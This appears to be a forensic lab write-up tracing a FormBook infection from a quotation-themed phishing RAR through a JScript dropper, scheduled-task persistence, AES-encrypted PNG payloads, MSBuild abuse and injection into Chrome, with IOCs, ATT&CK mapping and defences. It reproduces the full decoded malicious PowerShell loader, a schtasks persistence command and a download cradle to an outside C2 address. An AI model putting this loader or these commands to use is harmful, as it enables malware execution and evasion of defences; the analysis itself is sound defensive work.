An employee at the Silver Group opened what appeared to be a routine quotation request email. The attachment prompted a download, and shortly after opening it the workstation started behaving strangely — unexpected script activity, a new recurring scheduled task, and repeated outbound connections to unfamiliar hosts. Antivirus raised no alerts. A KAPE triage collection from the affected workstation was handed to the investigation team: file-system metadata, Sysmon telemetry, PowerShell transcripts, recovered loader scripts, and several disguised payload files staged in a world-writable directory. The task was to reconstruct the full chain from lure to FormBook C2 beaconing.
The investigation starts with Sysmon Event ID 1, filtering for browser process creation. New Outlook on this machine runs as a Windows App (OutlookForWindows) and opens URLs through an embedded WebView2 instance. The Sysmon process tree shows msedgewebview2.exe — Outlook’s internal renderer — spawning a full msedge.exe process with --single-argument pointing to the staging URL. The parent process reported by the lab is olk.exe, the logical host of the WebView2 instance, which started at 2026-04-29 14:25 UTC.

The Edge launch event exposes the full staging URL directly in the command line:

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://3.121.186.89:8000/08042026_0806_07042026_Quotation%%20Request.rar
The staging server at 3[.]121[.]186[.]89:8000 served the first-stage RAR archive directly. The filename — dated to mimic a business document — is a classic social engineering lure designed to look like a legitimate supplier quotation.
The RAR landed in C:\Users\byoussef\Downloads\. Checking the file properties confirms the exact size and hash:


The Edge download history in DB Browser for SQLite (History database, downloads table) provides precise timing. The start_time and end_time fields are stored as microseconds since 1601-01-01. Subtracting them and dividing by 1,000,000 gives a download duration of approximately 16 seconds — consistent with a 4.94 MB file over a reasonable connection.

Before the archive could execute, the user needed an extraction tool. Prefetch analysis via PECmd shows 7Z2401-X64.EXE ran just before the extraction — 7-Zip was freshly installed, version confirmed via the SOFTWARE hive under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip as 7-Zip 26.00. The prefetch for 7ZG.EXE shows a run at 2026-04-29 14:27:07, with file references including the downloaded RAR, confirming extraction.

Inside the archive was a single file: cbmjlzan.JS. The user double-clicked it — Sysmon Event ID 1 shows OpenWith.exe as the parent, spawning:

"C:\Windows\System32\WScript.exe" "C:\Users\byoussef\Downloads\08042026_0806_07042026_Quotation Request\cbmjlzan.JS"
Opening cbmjlzan.JS in Notepad++ reveals why it exceeds 10 MB — the entire payload is encoded as CJK Unified Ideographs, one character per byte. This encoding exploits the fact that CJK codepoints map cleanly to single byte values, allowing arbitrary binary data to survive as “text” that evades most string-based detection.

The encoded chunks are wrapped in a repeating ASCII delimiter that stands out immediately against the wall of Chinese characters: VFHDVXDJCFTUTW. This marker appears at the start and end of each data section and is stripped during decoding.

Before detonating the payloads, the dropper established persistence through two mechanisms visible in Sysmon Event ID 11 (file creation) and Event ID 1 (process creation).
First, the script copied itself to a persistent location:
C:\Users\Public\Libraries\cbmjlzan.JS
Then it created a scheduled task to re-execute every 15 minutes:
"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 15 /tn cbmjlzan.JS /tr C:\Users\Public\Libraries\cbmjlzan.JS
Pivoting into the SOFTWARE hive via Registry Explorer confirms the task under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cbmjlzan.JS, where the Id value reveals the assigned GUID:

{55AED6D3-C198-4BAE-872F-BC1BD3E01655}
Sysmon Event ID 11 shows WScript.exe writing three files to C:\Users\Public\ in sequence:

Orio.png → Brio.png → Xrio.png
These are not images. They are AES-CBC encrypted .NET assemblies disguised with PNG extensions and dropped to a world-writable directory. The naming is deliberate — Public bypasses most user-directory monitoring, and PNG extensions avoid executable file alerting.
The dropper also spawned an obfuscated PowerShell process (PID 8972) via WScript. Sysmon captures the command line, but it exceeded the 32KB log limit and was truncated. The key detail that survived: the Base64 blob is polluted throughout with the junk string VFHDVXDJCF — the same marker family used in the JS file — inserted to break automated Base64 detection. The -Noexit -nop -c iex pattern combined with [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(...)) is the standard in-memory execution cradle.

To recover the full script, the Base64 blob was extracted from the Sysmon event JSON and processed in CyberChef: Find/Replace removing all instances of VFHDVXDJCF, then From Base64, then Decode Text UTF-16LE:

The full decoded PowerShell script is reproduced below because it answers five questions in one pass and is the centrepiece of the loader chain:
$inputBase64FilePath = "C:\Users\PUBLIC\Xrio.png"
# Create a new AES object
$aes_var = [System.Security.Cryptography.Aes]::Create()
# Set AES parameters
$aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes_var.Key = [System.Convert]::FromBase64String('XctflJI8B7Qo2dA6FbwuHYAjjzjViSx3hThThXX1QUY=')
$aes_var.IV = [System.Convert]::FromBase64String('eb8a/RvZf2ltVDo2satMKg==')
$base64String = [System.IO.File]::ReadAllText($inputBase64FilePath)
$encryptedBytes = [System.Convert]::FromBase64String($base64String)
$memoryStream = [System.IO.MemoryStream]::new()
$memoryStream.Write($encryptedBytes, 0, $encryptedBytes.Length)
$memoryStream.Position = 0
$decryptor = $aes_var.CreateDecryptor()
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
$streamReader = New-Object System.IO.StreamReader($cryptoStream)
$decryptedString = $streamReader.ReadToEnd()
$cryptoStream.Close()
$memoryStream.Close()
$streamReader.Close()
$commands = $decryptedString -split "`n"
foreach ($encodedCommand in $commands) {
try {
$encodedCommand = $encodedCommand.Trim()
if (-not [string]::IsNullOrWhiteSpace($encodedCommand)) {
if ($encodedCommand -match '^[A-Za-z0-9+/=]+$' -and ($encodedCommand.Length % 4 -eq 0)) {
$decodedCommand = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encodedCommand))
Invoke-Expression $decodedCommand
}
}
} catch {}
}
$inputBase64FilePath = "C:\Users\PUBLIC\Orio.png"
$aes_var = [System.Security.Cryptography.Aes]::Create()
$aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes_var.Key = [System.Convert]::FromBase64String('KH4LLSO4gsNStF/NR15Oxu6oiybDl9SDt5Sa4uoeQIQ=')
$aes_var.IV = [System.Convert]::FromBase64String('SW4pGkqRJsjbGuetmmqTjA==')
$base64String = [System.IO.File]::ReadAllText($inputBase64FilePath)
$encryptedBytes = [System.Convert]::FromBase64String($base64String)
$memoryStream = [System.IO.MemoryStream]::new()
$memoryStream.Write($encryptedBytes, 0, $encryptedBytes.Length)
$memoryStream.Position = 0
$decryptor = $aes_var.CreateDecryptor()
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
$streamReader = New-Object System.IO.StreamReader($cryptoStream)
$decryptedString = $streamReader.ReadToEnd()
$cryptoStream.Close()
$memoryStream.Close()
$streamReader.Close()
$Allohaarnppp111=$decryptedString;
$Allohaarnppp1111='IN-';
$decryptedcode11='-in1';
$decryptedcode1=$Allohaarnppp111.IndexOf($Allohaarnppp1111);
$Allohaarnppp11111=$Allohaarnppp111.LastIndexOf($decryptedcode11);
if($decryptedcode1 -eq -1 -or $Allohaarnppp11111 -eq -1){ return };
$Allohaarnppp111111=$decryptedcode1+$Allohaarnppp1111.Length;
$decryptedcode=$Allohaarnppp111.Substring($Allohaarnppp111111,$Allohaarnppp11111-$Allohaarnppp111111);
$Allohaarnppp1111111111111=$decryptedcode.Replace('#','A').ToCharArray();
[Array]::Reverse($Allohaarnppp1111111111111);
$Allohaarnppp111111111111=$Allohaarnppp1111111111111 -join '';
[byte[]]$Allohaarnppp11111111111=[Convert]::FromBase64String($Allohaarnppp111111111111);
$Allohaarnppp1111111111=[AppDomain]::CurrentDomain.Load($Allohaarnppp11111111111);
$Allohaarnppp11111111=@('file:///C:/Users/Public/Brio.png','0','','','MSBuild','','MSBuild','','','','','','7','0','','0','','','');
try{
$Allohaarnppp111111111=$Allohaarnppp1111111111.GetType('Fiber.Program');
$Allohaarnppp1111111=$Allohaarnppp111111111.GetMethod('Main');
$Allohaarnppp1111111.Invoke($nUll,[object[]]$Allohaarnppp11111111)
}
catch{}
exit
The script performs two distinct decryption operations. The first targets Xrio.png using AES-CBC with PKCS7 padding. The decrypted content is a newline-delimited list of Base64-encoded commands — each is decoded from UTF-16LE and executed via Invoke-Expression. This is the AMSI/ETW patcher stage: the commands patch AmsiScanBuffer and EtwEventWrite in memory, blinding .NET security telemetry before the reflective loader runs. By patching these functions first, any subsequent .NET assembly loading happens outside the visibility of both AMSI scanning and ETW-based detection.
The second operation targets Orio.png with a different key and IV. After decryption, the loader extracts a Base64 substring between the delimiters IN- and -in1, replaces every # character with A, reverses the resulting array, then converts the corrected Base64 to a byte array. The result is a .NET assembly loaded directly into the current AppDomain via [AppDomain]::CurrentDomain.Load(). The loader then resolves Fiber.Program.Main by reflection and invokes it, passing file:///C:/Users/Public/Brio.png as the first argument — the path to the final payload.
Fiber.Program.Main uses MSBuild as its execution vehicle. Sysmon Event ID 1 at 14:28:57 shows MSBuild.exe (PID 10548) spawned by the PowerShell process (PID 8972):

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
FileVersion: 4.8.9037.0
MSBuild is a trusted, signed Microsoft developer utility — it runs with implicit trust on most endpoints and is not monitored by default. Using it as the execution host for Brio.png’s shellcode means the malicious activity appears in process trees as legitimate .NET build infrastructure.
The Sysmon telemetry confirms the injection path: PowerShell PID 8972 injected into MSBuild PID 10548, which then continued injecting down a process chain until FormBook was running inside chrome.exe (PID 2864).
FormBook’s C2 evasion relies on decoy DNS queries — the injected process fires queries to a large list of legitimate-looking domains to hide the real C2 beacon among noise. Sysmon Event ID 22 shows chrome.exe PID 2864 generating this traffic starting at 14:29:22 UTC, with the first recorded query being www.0a8b2y[.]asia resolving to 156[.]244[.]73[.]169.

Separately from the PNG loader chain, the dropper also executed a hidden PowerShell command using IEX ((New-Object Net.WebClient).DownloadString(...)) — a classic in-memory download cradle reaching out to a second C2 server:

http://34.236.155.32:80/a
A Sysmon Event ID 3 (network connection) for this PowerShell process confirms the victim’s outbound source IP as 10.10.11.138, validating that the cradle successfully connected.


| Phase | Action |
|---|---|
| Initial Access | Phishing email lure; user clicked link in New Outlook, spawning Edge to download RAR from hxxp[://]3[.]121[.]186[.]89:8000 |
| Delivery | RAR archive 08042026_0806_07042026_Quotation Request.rar (5,180,553 bytes) downloaded in 16 seconds |
| Execution | User extracted archive with 7-Zip 26.00; double-clicked cbmjlzan.JS; WScript.exe executed dropper |
| Persistence | Script copied to C:\Users\Public\Libraries\cbmjlzan.JS; scheduled task created running every 15 minutes |
| Defense Evasion | CJK Unified Ideograph encoding in JS; junk string obfuscation in Base64 PowerShell blob; AMSI/ETW patching via Xrio.png payload |
| Payload Staging | Three AES-CBC encrypted PNG files written to C:\Users\Public\: Orio.png, Brio.png, Xrio.png |
| Execution (Stage 2) | PowerShell PID 8972 decrypted and loaded Xrio.png (AMSI/ETW patcher) then Orio.png (reflective loader) |
| LOLBin Abuse | Fiber.Program.Main loaded Brio.png via MSBuild.exe v4.8.9037.0 (PID 10548) |
| Injection | MSBuild injected into Chrome (PID 2864); FormBook beaconing began at 14:29 UTC |
| C2 | FormBook decoy DNS queries from chrome.exe; download cradle to hxxp[://]34[.]236[.]155[.]32:80/a |
| Type | Value |
|---|---|
| URL (Staging) | hxxp[://]3[.]121[.]186[.]89:8000/08042026_0806_07042026_Quotation%20Request[.]rar |
| IP (Staging Server) | 3[.]121[.]186[.]89 |
| IP (Download Cradle C2) | 34[.]236[.]155[.]32 |
| File | 08042026_0806_07042026_Quotation Request.rar |
| SHA256 (RAR) | E6CB4D92D873AD02564CE38E283180446E557462A713F2885DBC99A979FA9F81 |
| File | cbmjlzan.JS |
| File | C:\Users\Public\Libraries\cbmjlzan.JS |
| File | C:\Users\Public\Orio.png |
| File | C:\Users\Public\Brio.png |
| File | C:\Users\Public\Xrio.png |
| SHA256 (Orio.png) | 85F32EB745BB3E290D7A4721FBEF005574D02DEDC2C25D0B958A379C5CF9DEC8 |
| Scheduled Task | cbmjlzan.JS ({55AED6D3-C198-4BAE-872F-BC1BD3E01655}) |
| Domain (FormBook decoy) | www[.]0a8b2y[.]asia |
| IP (FormBook decoy) | 156[.]244[.]73[.]169 |
| Victim Internal IP | 10.10.11.138 |
| Technique | ID | Description |
|---|---|---|
| Spearphishing Attachment | T1566.001 | Phishing email with quotation lure delivering RAR archive |
| JavaScript | T1059.007 | cbmjlzan.JS executed by WScript.exe as initial dropper |
| PowerShell | T1059.001 | Obfuscated PowerShell cradle with junk-string Base64 for in-memory payload decryption |
| Obfuscated Files or Information: CJK Encoding | T1027 | CJK Unified Ideographs encoding of payload bytes in JScript dropper |
| Obfuscated Files or Information: Steganography | T1027.003 | AES-CBC encrypted payloads disguised as PNG image files |
| Scheduled Task | T1053.005 | Recurring 15-minute scheduled task pointing to persistence copy of dropper |
| Impair Defenses: AMSI Bypass | T1562.001 | Xrio.png payload patches AmsiScanBuffer and EtwEventWrite in memory |
| Trusted Developer Utilities Proxy Execution: MSBuild | T1218.004 | Fiber loader invokes MSBuild.exe v4.8.9037.0 to host and execute Brio.png payload |
| Process Injection | T1055 | FormBook injected from MSBuild into chrome.exe (PID 2864) |
| Application Layer Protocol: DNS | T1071.004 | FormBook decoy DNS queries issued from injected chrome.exe process |
| Ingress Tool Transfer | T1105 | Download cradle reaching hxxp[://]34[.]236[.]155[.]32:80/a |
Block JScript execution via WScript. The entire intrusion pivoted on a user double-clicking a .JS file. Enforcing Software Restriction Policies or AppLocker rules that prevent WScript.exe and CScript.exe from executing user-downloaded scripts would have terminated the chain at step one. At minimum, associate .JS files with Notepad rather than WScript by default.
Monitor and restrict MSBuild. MSBuild.exe has no legitimate reason to run on an end-user workstation outside a developer environment. Its presence in Sysmon event logs — especially when spawned by PowerShell or WScript — is a high-fidelity indicator of T1218.004 abuse. Block it via AppLocker in non-developer environments, or alert on any instance where its parent is a script interpreter.
AMSI and ETW patch detection. The Xrio.png stage specifically patched AmsiScanBuffer and EtwEventWrite before loading further assemblies, indicating the attacker expected these controls to be active. Kernel-level telemetry (e.g. Sysmon’s ProcessAccess events showing writes into amsi.dll address space) can detect this patching even when AMSI itself has been blinded.
Scheduled task persistence visibility. The dropper created a 15-minute recurring task under the name cbmjlzan.JS — an obviously anomalous task name. Monitoring Task Scheduler event log (Event ID 4698 — task created) and correlating with the creating process would have surfaced this immediately. The registry confirmation path TaskCache\Tree\cbmjlzan.JS is equally auditable.
Egress filtering and DNS monitoring. FormBook’s decoy DNS strategy relies on volume — firing queries to dozens of domains to hide the real beacon. This generates an anomalous spike in DNS query rate from a single process. DNS-over-SIEM rules alerting on processes generating more than N unique external queries per minute, combined with egress filtering that blocks outbound connections from browser processes to non-proxied destinations, would have contained the C2 activity.